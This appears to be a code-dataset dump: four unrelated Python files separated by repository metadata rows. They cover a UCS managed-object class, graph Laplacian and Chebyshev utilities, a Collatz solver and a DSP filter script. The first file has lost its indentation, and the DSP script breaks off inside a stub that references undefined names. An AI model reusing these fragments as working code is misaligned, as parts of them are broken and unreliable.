RMT_ERR_CODE_ERR_MAX_USERID_SESSIONS_REACHED = "ERR-max-userid-sessions-reached"
RMT_ERR_CODE_ERR_MISSING_METHOD = "ERR-missing-method"
RMT_ERR_CODE_ERR_MODIFY_LOCALE = "ERR-modify-locale"
RMT_ERR_CODE_ERR_MODIFY_ROLE = "ERR-modify-role"
RMT_ERR_CODE_ERR_MODIFY_USER = "ERR-modify-user"
RMT_ERR_CODE_ERR_MODIFY_USER_LOCALE = "ERR-modify-user-locale"
RMT_ERR_CODE_ERR_MODIFY_USER_ROLE = "ERR-modify-user-role"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_MODIFY_ERROR = "ERR-provider-group-modify-error"
RMT_ERR_CODE_ERR_PROVIDER_GROUP_SET_ERROR = "ERR-provider-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_GET_ERROR = "ERR-radius-get-error"
RMT_ERR_CODE_ERR_RADIUS_GLOBAL_SET_ERROR = "ERR-radius-global-set-error"
RMT_ERR_CODE_ERR_RADIUS_GROUP_SET_ERROR = "ERR-radius-group-set-error"
RMT_ERR_CODE_ERR_RADIUS_SET_ERROR = "ERR-radius-set-error"
RMT_ERR_CODE_ERR_REQUEST_TIMEOUT = "ERR-request-timeout"
RMT_ERR_CODE_ERR_RESET_ADAPTER = "ERR-reset-adapter"
RMT_ERR_CODE_ERR_ROLE_SET_ERROR = "ERR-role-set-error"
RMT_ERR_CODE_ERR_SECONDARY_NODE = "ERR-secondary-node"
RMT_ERR_CODE_ERR_SERVICE_NOT_READY = "ERR-service-not-ready"
RMT_ERR_CODE_ERR_SESSION_CACHE_FULL = "ERR-session-cache-full"
RMT_ERR_CODE_ERR_SESSION_NOT_FOUND = "ERR-session-not-found"
RMT_ERR_CODE_ERR_SET_KEY_CERT = "ERR-set-key-cert"
RMT_ERR_CODE_ERR_SET_LOGIN_PROFILE = "ERR-set-login-profile"
RMT_ERR_CODE_ERR_SET_MIN_PASSPHRASE_LENGTH = "ERR-set-min-passphrase-length"
RMT_ERR_CODE_ERR_SET_NETWORK = "ERR-set-network"
RMT_ERR_CODE_ERR_SET_PASSWORD_STRENGTH_CHECK = "ERR-set-password-strength-check"
RMT_ERR_CODE_ERR_SET_PORT_CHANNEL = "ERR-set-port-channel"
RMT_ERR_CODE_ERR_STORE_PRE_LOGIN_BANNER_MSG = "ERR-store-pre-login-banner-msg"
RMT_ERR_CODE_ERR_TACACS_ENABLE_ERROR = "ERR-tacacs-enable-error"
RMT_ERR_CODE_ERR_TACACS_GLOBAL_SET_ERROR = "ERR-tacacs-global-set-error"
RMT_ERR_CODE_ERR_TACACS_GROUP_SET_ERROR = "ERR-tacacs-group-set-error"
RMT_ERR_CODE_ERR_TACACS_PLUS_GET_ERROR = "ERR-tacacs-plus-get-error"
RMT_ERR_CODE_ERR_TACACS_SET_ERROR = "ERR-tacacs-set-error"
RMT_ERR_CODE_ERR_TEST_ERROR_1 = "ERR-test-error-1"
RMT_ERR_CODE_ERR_TEST_ERROR_2 = "ERR-test-error-2"
RMT_ERR_CODE_ERR_TIMEZONE_SET_ERROR = "ERR-timezone-set-error"
RMT_ERR_CODE_ERR_USER_ACCOUNT_EXPIRED = "ERR-user-account-expired"
RMT_ERR_CODE_ERR_USER_SET_ERROR = "ERR-user-set-error"
RMT_ERR_CODE_ERR_XML_PARSE_ERROR = "ERR-xml-parse-error"
RMT_ERR_CODE_NONE = "none"
class EquipmentSwitchIOCardFsm(ManagedObject):
"""This is EquipmentSwitchIOCardFsm class."""
consts = EquipmentSwitchIOCardFsmConsts()
naming_props = set([])
mo_meta = MoMeta("EquipmentSwitchIOCardFsm", "equipmentSwitchIOCardFsm", "fsm", VersionMeta.Version302c, "OutputOnly", 0xf, [], [""], [u'equipmentSwitchIOCard'], [u'equipmentSwitchIOCardFsmStage'], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version302c, MoPropertyMeta.INTERNAL, None, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"completion_time": MoPropertyMeta("completion_time", "completionTime", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", [""], []),
"current_fsm": MoPropertyMeta("current_fsm", "currentFsm", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["Evacuate", "FeConn", "FePresence", "ResetEvacuate", "nop"], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []),
"fsm_status": MoPropertyMeta("fsm_status", "fsmStatus", "string", VersionMeta.Version302c, MoPropertyMeta.INTERNAL, None, None, None, None, ["fail", "inProgress", "nop", "pending", "skip", "success", "throttled"], []),
"instance_id": MoPropertyMeta("instance_id", "instanceId", "uint", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"progress": MoPropertyMeta("progress", "progress", "byte", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, [], ["0-100"]),
"rmt_err_code": MoPropertyMeta("rmt_err_code", "rmtErrCode", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, None, ["ERR-2fa-auth-retry", "ERR-ACTIVATE-failed", "ERR-ACTIVATE-in-progress", "ERR-ACTIVATE-retry", "ERR-BIOS-TOKENS-OLD-BIOS", "ERR-BIOS-TOKENS-OLD-CIMC", "ERR-BIOS-network-boot-order-not-found", "ERR-BOARDCTRLUPDATE-ignore", "ERR-DIAG-cancelled", "ERR-DIAG-fsm-restarted", "ERR-DIAG-test-failed", "ERR-DNLD-authentication-failure", "ERR-DNLD-hostkey-mismatch", "ERR-DNLD-invalid-image", "ERR-DNLD-no-file", "ERR-DNLD-no-space", "ERR-DNLD-usb-unmounted", "ERR-DNS-delete-error", "ERR-DNS-get-error", "ERR-DNS-set-error", "ERR-Diagnostics-in-progress", "ERR-Diagnostics-memtest-in-progress", "ERR-Diagnostics-network-in-progress", "ERR-FILTER-illegal-format", "ERR-FSM-no-such-state", "ERR-HOST-fru-identity-mismatch", "ERR-HTTP-set-error", "ERR-HTTPS-set-error", "ERR-IBMC-analyze-results", "ERR-IBMC-connect-error", "ERR-IBMC-connector-info-retrieval-error", "ERR-IBMC-fru-retrieval-error", "ERR-IBMC-invalid-end-point-config", "ERR-IBMC-results-not-ready", "ERR-MAX-subscriptions-allowed-error", "ERR-MO-CONFIG-child-object-cant-be-configured", "ERR-MO-META-no-such-object-class", "ERR-MO-PROPERTY-no-such-property", "ERR-MO-PROPERTY-value-out-of-range", "ERR-MO-access-denied", "ERR-MO-deletion-rule-violation", "ERR-MO-duplicate-object", "ERR-MO-illegal-containment", "ERR-MO-illegal-creation", "ERR-MO-illegal-iterator-state", "ERR-MO-illegal-object-lifecycle-transition", "ERR-MO-naming-rule-violation", "ERR-MO-object-not-found", "ERR-MO-resource-allocation", "ERR-NTP-delete-error", "ERR-NTP-get-error", "ERR-NTP-set-error", "ERR-POWER-CAP-UNSUPPORTED", "ERR-POWER-PROFILE-IN-PROGRESS", "ERR-SERVER-mis-connect", "ERR-SWITCH-invalid-if-config", "ERR-TOKEN-request-denied", "ERR-UNABLE-TO-FETCH-BIOS-SETTINGS", "ERR-UPDATE-failed", "ERR-UPDATE-in-progress", "ERR-UPDATE-retry", "ERR-aaa-config-modify-error", "ERR-acct-realm-set-error", 
"ERR-admin-passwd-set", "ERR-auth-issue", "ERR-auth-realm-get-error", "ERR-auth-realm-set-error", "ERR-authentication", "ERR-authorization-required", "ERR-cli-session-limit-reached", "ERR-create-keyring", "ERR-create-locale", "ERR-create-role", "ERR-create-tp", "ERR-create-user", "ERR-delete-locale", "ERR-delete-role", "ERR-delete-session", "ERR-delete-user", "ERR-downgrade-fail", "ERR-efi-Diagnostics--in-progress", "ERR-enable-mgmt-conn", "ERR-ep-set-error", "ERR-get-max-http-user-sessions", "ERR-http-initializing", "ERR-insufficiently-equipped", "ERR-internal-error", "ERR-ldap-delete-error", "ERR-ldap-get-error", "ERR-ldap-group-modify-error", "ERR-ldap-group-set-error", "ERR-ldap-set-error", "ERR-locale-set-error", "ERR-max-userid-sessions-reached", "ERR-missing-method", "ERR-modify-locale", "ERR-modify-role", "ERR-modify-user", "ERR-modify-user-locale", "ERR-modify-user-role", "ERR-provider-group-modify-error", "ERR-provider-group-set-error", "ERR-radius-get-error", "ERR-radius-global-set-error", "ERR-radius-group-set-error", "ERR-radius-set-error", "ERR-request-timeout", "ERR-reset-adapter", "ERR-role-set-error", "ERR-secondary-node", "ERR-service-not-ready", "ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", "ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version302c, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "EquipmentSwitchIOCardFsm", parent_mo_or_dn, **kwargs)
| 87.738318 | 3,727 | 0.75703 |
795b997d8204e79adf618a4822d4276463cb7663 | 7,235 | py | Python | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | 1 | 2019-08-02T21:57:39.000Z | 2019-08-02T21:57:39.000Z | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | null | null | null | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | null | null | null | import sklearn.metrics
import sklearn.neighbors
import matplotlib.pyplot as plt
import scipy.sparse
import scipy.sparse.linalg
import scipy.spatial.distance
import numpy as np
def grid(m, dtype=np.float32):
"""Return the embedding of a grid graph."""
M = m**2
x = np.linspace(0, 1, m, dtype=dtype)
y = np.linspace(0, 1, m, dtype=dtype)
xx, yy = np.meshgrid(x, y)
z = np.empty((M, 2), dtype)
z[:, 0] = xx.reshape(M)
z[:, 1] = yy.reshape(M)
return z
def distance_scipy_spatial(z, k=4, metric='euclidean'):
    """Compute exact pairwise distances and the k nearest neighbors.

    Returns (d, idx): for every point, the distances to its k nearest
    neighbors (self excluded) and the neighbors' indices.
    """
    pairwise = scipy.spatial.distance.squareform(
        scipy.spatial.distance.pdist(z, metric))
    # Column 0 of the argsort is the point itself (distance 0); skip it.
    neighbors = np.argsort(pairwise)[:, 1:k + 1]
    pairwise.sort()
    return pairwise[:, 1:k + 1], neighbors
def distance_sklearn_metrics(z, k=4, metric='euclidean'):
    """Compute exact pairwise distances with scikit-learn.

    Same contract as distance_scipy_spatial: returns the k nearest
    distances and neighbor indices for every point, self excluded.
    """
    pairwise = sklearn.metrics.pairwise.pairwise_distances(
        z, metric=metric, n_jobs=1)
    # Skip column 0 (each point's zero distance to itself).
    neighbors = np.argsort(pairwise)[:, 1:k + 1]
    pairwise.sort()
    return pairwise[:, 1:k + 1], neighbors
def distance_lshforest(z, k=4, metric='cosine'):
    """Return an approximation of the k-nearest cosine distances.

    Uses locality-sensitive hashing; only the cosine metric is supported.
    NOTE(review): sklearn.neighbors.LSHForest was deprecated in
    scikit-learn 0.19 and removed in 0.21 — this path needs a modern
    replacement (e.g. an external ANN library) to run at all; verify the
    pinned sklearn version before relying on it.
    """
    # Fixed: compare string *contents* with ==, not identity with `is`
    # (the old form only worked through CPython string interning and is a
    # SyntaxWarning on Python 3.8+).
    assert metric == 'cosine'
    lshf = sklearn.neighbors.LSHForest()
    lshf.fit(z)
    dist, idx = lshf.kneighbors(z, n_neighbors=k + 1)
    # Each point must find itself at (near-)zero distance.
    assert dist.min() < 1e-10
    # Clamp tiny negative values produced by floating-point error.
    dist[dist < 0] = 0
    return dist, idx
# TODO: other ANNs s.a. NMSLIB, EFANNA, FLANN, Annoy, sklearn neighbors, PANN
def adjacency(dist, idx):
    """Return the adjacency matrix of a kNN graph.

    :param dist: (M, k) distances to each point's k nearest neighbors
    :param idx:  (M, k) indices of those neighbors
    :return: symmetric CSR weight matrix with Gaussian-kernel weights,
             no self-loops
    """
    M, k = dist.shape
    # Fixed: the original `assert M, k == idx.shape` only asserted that M is
    # truthy — everything after the comma was the assertion *message*.
    assert (M, k) == idx.shape
    assert dist.min() >= 0

    # Gaussian kernel; bandwidth from the mean k-th-neighbor distance.
    sigma2 = np.mean(dist[:, -1])**2
    dist = np.exp(- dist**2 / sigma2)

    # Sparse weight matrix from the flattened neighbor lists.
    I = np.arange(0, M).repeat(k)
    J = idx.reshape(M*k)
    V = dist.reshape(M*k)
    W = scipy.sparse.coo_matrix((V, (I, J)), shape=(M, M))

    # No self-connections. Fixed: COO matrices do not support setdiag()
    # (no item assignment) on current SciPy — convert to CSR first and
    # drop any explicit zeros that the assignment leaves behind.
    W = W.tocsr()
    W.setdiag(0)
    W.eliminate_zeros()

    # Non-directed graph: keep the larger of W[i, j] and W[j, i].
    bigger = W.T > W
    W = W - W.multiply(bigger) + W.T.multiply(bigger)

    assert W.nnz % 2 == 0
    assert np.abs(W - W.T).mean() < 1e-10
    # Fixed: scipy.sparse.csr is a deprecated private namespace; check the
    # public class instead.
    assert isinstance(W, scipy.sparse.csr_matrix)
    return W
def replace_random_edges(A, noise_level):
    """Replace randomly chosen edges of A by random edges.

    `noise_level` is the fraction of (undirected) edges to rewire; the new
    edges get weight 1. Returns a CSR matrix with the diagonal cleared.
    """
    M, M = A.shape
    n_swap = int(noise_level * A.nnz // 2)

    # Draw everything up front: which upper-triangular edges to drop and
    # the endpoints of their replacements.
    chosen = np.random.permutation(A.nnz // 2)[:n_swap]
    new_rows = np.random.randint(0, M, n_swap)
    new_cols = np.random.randint(0, M, n_swap)
    new_vals = np.random.uniform(0, 1, n_swap)
    assert len(chosen) == len(new_rows) == len(new_cols) == len(new_vals)

    A_upper = scipy.sparse.triu(A, format='coo')
    assert A_upper.nnz == A.nnz // 2
    assert A_upper.nnz >= n_swap
    A = A.tolil()

    for pos, r, c, v in zip(chosen, new_rows, new_cols, new_vals):
        # Remove the old symmetric edge, then insert the new one.
        old_r = A_upper.row[pos]
        old_c = A_upper.col[pos]
        A[old_r, old_c] = 0
        A[old_c, old_r] = 0
        A[r, c] = 1
        A[c, r] = 1

    A.setdiag(0)
    A = A.tocsr()
    A.eliminate_zeros()
    return A
def laplacian(W, normalized=True):
    """Return the Laplacian of the weight matrix W.

    :param W: symmetric sparse weight (adjacency) matrix
    :param normalized: if True return I - D^{-1/2} W D^{-1/2},
                       otherwise the combinatorial Laplacian D - W
    :return: sparse CSR Laplacian
    """
    # Degree vector (column sums of the symmetric weight matrix).
    d = W.sum(axis=0)

    if not normalized:
        D = scipy.sparse.diags(d.A.squeeze(), 0)
        L = D - W
    else:
        # Nudge zero degrees by the smallest representable step so the
        # inverse square root never divides by zero (isolated vertices).
        d += np.spacing(np.array(0, W.dtype))
        d = 1 / np.sqrt(d)
        D = scipy.sparse.diags(d.A.squeeze(), 0)
        I = scipy.sparse.identity(d.size, dtype=W.dtype)
        L = I - D * W * D

    # assert np.abs(L - L.T).mean() < 1e-9
    # Fixed: scipy.sparse.csr.csr_matrix is a deprecated/removed private
    # namespace path; test against the public class instead.
    assert isinstance(L, scipy.sparse.csr_matrix)
    return L
def lmax(L, normalized=True):
    """Upper-bound on the spectrum of the Laplacian L."""
    if normalized:
        # The normalized Laplacian spectrum is contained in [0, 2].
        return 2
    # Otherwise compute the largest-magnitude eigenvalue explicitly.
    largest = scipy.sparse.linalg.eigsh(
        L, k=1, which='LM', return_eigenvectors=False)
    return largest[0]
def fourier(L, algo='eigh', k=1):
    """Return the Fourier basis, i.e. the EVD of the Laplacian.

    :param L: sparse Laplacian matrix
    :param algo: 'eig'/'eigh' for dense full decompositions,
                 'eigs'/'eigsh' for sparse partial ones (k eigenpairs)
    :param k: number of eigenpairs for the sparse algorithms
    :return: (eigenvalues, eigenvectors), ascending for all branches
    """
    def sort(lamb, U):
        # Order eigenpairs by ascending eigenvalue.
        idx = lamb.argsort()
        return lamb[idx], U[:, idx]

    # Fixed: the original compared strings with `is` (object identity),
    # which only works by accident of CPython interning and warns on
    # Python 3.8+; use == equality.
    if algo == 'eig':
        lamb, U = np.linalg.eig(L.toarray())
        lamb, U = sort(lamb, U)
    elif algo == 'eigh':
        # eigh already returns eigenvalues in ascending order.
        lamb, U = np.linalg.eigh(L.toarray())
    elif algo == 'eigs':
        lamb, U = scipy.sparse.linalg.eigs(L, k=k, which='SM')
        lamb, U = sort(lamb, U)
    elif algo == 'eigsh':
        lamb, U = scipy.sparse.linalg.eigsh(L, k=k, which='SM')

    return lamb, U
def plot_spectrum(L, algo='eig'):
    """Plot the spectrum of a list of multi-scale Laplacians L.

    Each coarsening level i is drawn with a horizontal stride of 2**i so
    the spectra line up against the finest level's node count.
    """
    # Algo is eig to be sure to get all eigenvalues.
    plt.figure(figsize=(17, 5))
    for i, lap in enumerate(L):
        lamb, U = fourier(lap, algo)
        step = 2**i
        x = range(step//2, L[0].shape[0], step)
        lb = 'L_{} spectrum in [{:1.2e}, {:1.2e}]'.format(i, lamb[0], lamb[-1])
        plt.plot(x, lamb, '.', label=lb)
    plt.legend(loc='best')
    plt.xlim(0, L[0].shape[0])
    # Fixed: plt.ylim(ymin=0) — the `ymin` keyword was deprecated and then
    # removed in Matplotlib 3; `bottom` is the supported spelling.
    plt.ylim(bottom=0)
def lanczos(L, X, K):
    """
    Given the graph Laplacian and a data matrix, return a data matrix which can
    be multiplied by the filter coefficients to filter X using the Lanczos
    polynomial approximation.
    """
    M, N = X.shape
    assert L.dtype == X.dtype

    def basis(L, X, K):
        """
        Lanczos algorithm which computes the orthogonal matrix V and the
        tri-diagonal matrix H.
        """
        # a: diagonal of H, b: off-diagonal; one Krylov basis per column of X.
        a = np.empty((K, N), L.dtype)
        b = np.zeros((K, N), L.dtype)
        V = np.empty((K, M, N), L.dtype)
        # Start each basis with the normalized input signal.
        V[0, ...] = X / np.linalg.norm(X, axis=0)
        for k in range(K-1):
            W = L.dot(V[k, ...])
            a[k, :] = np.sum(W * V[k, ...], axis=0)
            # Orthogonalize against the two previous Lanczos vectors
            # (three-term recurrence; no b-term on the first step).
            W = W - a[k, :] * V[k, ...] - (
                b[k, :] * V[k-1, ...] if k > 0 else 0)
            b[k+1, :] = np.linalg.norm(W, axis=0)
            V[k+1, ...] = W / b[k+1, :]
        a[K-1, :] = np.sum(L.dot(V[K-1, ...]) * V[K-1, ...], axis=0)
        return V, a, b

    def diag_H(a, b, K):
        """Diagonalize the tri-diagonal H matrix."""
        # Pack a (diagonal) and b (sub-diagonal) into K x K matrices, one
        # per signal, using strided flat assignment.
        H = np.zeros((K*K, N), a.dtype)
        H[:K**2:K+1, :] = a
        H[1:(K-1)*K:K+1, :] = b[1:, :]
        H.shape = (K, K, N)
        # Eigenvectors of the (symmetric) tri-diagonal H; lower triangle used.
        Q = np.linalg.eigh(H.T, UPLO='L')[1]
        Q = np.swapaxes(Q, 1, 2).T
        return Q

    V, a, b = basis(L, X, K)
    Q = diag_H(a, b, K)
    # Project each signal's Krylov basis onto the Ritz vectors.
    Xt = np.empty((K, M, N), L.dtype)
    for n in range(N):
        Xt[..., n] = Q[..., n].T.dot(V[..., n])
    # Scale by the first Ritz row and restore the original signal norms.
    Xt *= Q[0, :, np.newaxis, :]
    Xt *= np.linalg.norm(X, axis=0)
    return Xt  # Q[0, ...]
def rescale_L(L, lmax=2):
    """Rescale the Laplacian eigenvalues in [-1,1].

    Maps the spectrum [0, lmax] onto [-1, 1] in place: scale by 2/lmax,
    then subtract the identity.
    """
    M, M = L.shape
    identity = scipy.sparse.identity(M, format='csr', dtype=L.dtype)
    L /= lmax / 2
    L -= identity
    return L
def chebyshev(L, X, K):
    """Return T_k X where T_k are the Chebyshev polynomials of order up to K.
    Complexity is O(KMN)."""
    M, N = X.shape
    assert L.dtype == X.dtype
    # L = rescale_L(L, lmax)

    # Xt[k] holds T_k(L) @ X, built with the three-term recurrence.
    Xt = np.empty((K, M, N), L.dtype)
    Xt[0, ...] = X                      # T_0 X = I X = X
    if K > 1:
        Xt[1, ...] = L.dot(X)           # T_1 X = L X
    for order in range(2, K):
        # T_k X = 2 L T_{k-1} X - T_{k-2} X
        Xt[order, ...] = 2 * L.dot(Xt[order-1, ...]) - Xt[order-2, ...]
    return Xt
| 27.934363 | 79 | 0.540981 |
795b9a507ea0f9641e8e77d09d76e99bd4bdbddf | 339 | py | Python | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | from tqdm import tqdm
def chain(n):
    """Return the length of the Collatz chain starting at n.

    Counts both n itself and the terminating 1 (so chain(1) == 1).
    """
    if n == 1:
        return 1
    if n % 2 == 0:
        # Fixed: use integer division. `n / 2` produced floats, which lose
        # exactness once intermediate Collatz values exceed 2**53.
        return 1 + chain(n // 2)
    return 1 + chain(3 * n + 1)
def sol(limit: int):
    """Return the starting number below `limit` with the longest Collatz chain."""
    best_length = 0
    best_start = 1
    for candidate in tqdm(range(1, limit)):
        length = chain(candidate)
        if length > best_length:
            best_length = length
            best_start = candidate
    return best_start
print(sol(int(1e6)))
| 16.95 | 35 | 0.451327 |
795b9beab8369f6cd281feeb246bc9d33f5cd028 | 10,555 | py | Python | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | """
Genetic Algorithms for Digital Signal Processing
Created on Mon Oct 05 20:01:05 2020
Last Edited on Mon Oct 12 2020 by Luke Trenberth
TODO tidy up this code and to finalise it. Add up the third FIR filter method in here too.
"""
from os import major
import numpy as np
import matplotlib
from scipy import signal
from scipy.fftpack import fft
import matplotlib.pyplot as plt
import DSP_GA as ga
class DSP_Signal():
    """A sampled signal loaded from a whitespace-delimited text file.

    Offers several FIR/IIR noise-filtering strategies (window method,
    Parks-McClellan, frequency sampling) plus SNR-style helpers used as
    the GA fitness function.
    """

    def __init__(self, filename, fs=1024, N_Coeff=400):
        """Read samples from `filename`.

        :param filename: path to a text file of whitespace-separated numbers
        :param fs: sample rate, Hz
        :param N_Coeff: FIR filter order used by the filtering methods
        """
        # Fixed: use a context manager so the file handle is always closed.
        self.y_0 = []
        with open(filename, "r") as file:
            for line in file:
                words = line.split(" ")
                for word in words:
                    if word != "":
                        self.y_0.append(float(word))
        self.fs = fs
        self.N = len(self.y_0)
        self.N_2 = int(self.N / 2)
        # Time axis and (one-sided) frequency axis for plotting.
        self.t = [x / self.fs for x in list(range(0, self.N))]
        self.f = [x * self.fs / self.N for x in list(range(0, self.N_2))]
        self.P_0 = np.var(self.y_0)         # power (variance) of the raw signal
        self.FFT_0 = fft(self.y_0)
        self.N_Coeff = N_Coeff              # Number of coefficients

    # Window Filtering method for the data class
    def WF(self, GA_data):
        """Band-stop filter via the window method.

        :param GA_data: [noise_f_1, noise_f_2, width] — the two noise
                        frequencies and the stop-band width, Hz
        :return: SNR-style fitness of the filtered signal
        """
        self.width_WF = 8  # Width of stop band, Hz (unused by the bands below)
        self.band_1 = [GA_data[0] - GA_data[2]/2, GA_data[0] + GA_data[2]/2]  # Define band 1 bounds
        self.band_2 = [GA_data[1] - GA_data[2]/2, GA_data[1] + GA_data[2]/2]  # Define band 2 bounds

        filter1 = signal.firwin(self.N_Coeff+1, self.band_1, window='hann', pass_zero='bandstop', fs=self.fs)
        filter2 = signal.firwin(self.N_Coeff+1, self.band_2, window='hann', pass_zero='bandstop', fs=self.fs)
        # Cascade the two notch filters by convolving their impulse responses.
        self.filter1_WF = filter1
        self.filter2_WF = filter2
        self.filter_WF = signal.convolve(filter1, filter2)

        self.y_WF = signal.lfilter(self.filter_WF, 1, self.y_0)          # filtered time-domain signal
        self.f_WF, self.h_WF = signal.freqz(self.filter_WF, 1, fs=self.fs)  # filter frequency response
        self.FFT_WF = fft(self.y_WF)
        return self.SNR(self.y_WF)

    # Parks-McClellan Filtering Method
    def PM(self, GA_data, TW=3, BW=5):
        """Band-stop filter via the Parks-McClellan (remez) algorithm.

        :param GA_data: [f_1, f_2(, TW(, BW))] noise frequencies and optional
                        transition width / band width overrides, Hz
        :return: SNR-style fitness of the filtered signal
        """
        f_1 = GA_data[0]
        f_2 = GA_data[1]
        if len(GA_data) > 2:
            TW = GA_data[2]
        if len(GA_data) > 3:
            BW = GA_data[3]

        # Band edges: pass / transition / stop / transition / pass.
        band1_PM = [0, f_1 - BW/2 - TW, f_1 - BW/2, f_1 + BW/2, f_1 + BW/2 + TW, self.fs/2]
        band2_PM = [0, f_2 - BW/2 - TW, f_2 - BW/2, f_2 + BW/2, f_2 + BW/2 + TW, self.fs/2]
        gain_PM = [1, 0, 1]

        filter1_PM = signal.remez(self.N_Coeff+1, band1_PM, gain_PM, fs=self.fs)  # Filter frequency 1
        filter2_PM = signal.remez(self.N_Coeff+1, band2_PM, gain_PM, fs=self.fs)  # Filter frequency 2
        filter_PM = signal.convolve(filter1_PM, filter2_PM)                       # Combined Filter

        self.y_PM = signal.lfilter(filter_PM, 1, self.y_0)
        self.f_PM, self.h_PM = signal.freqz(filter_PM, 1, fs=self.fs)
        self.FFT_PM = fft(self.y_PM)
        return self.SNR(self.y_PM)

    # TODO Frequency Sampling Filtering Method. THIS IS COPIED FROM ASSIGNMENT I.
    def FS(self, fs):
        """Frequency-sampling band-stop filter (non-functional stub).

        NOTE(review): this method still references module-level names from
        the assignment it was copied from (`noise_f`, `N_Coeff`, `y_0`) that
        do not exist here — it raises NameError if called. Port it to use
        self.* attributes and an explicit noise-frequency argument.
        """
        trans_FS = 4  # Width of transition from pass band to stop band, Hz
        width_FS = 8  # Width of the stop band, Hz
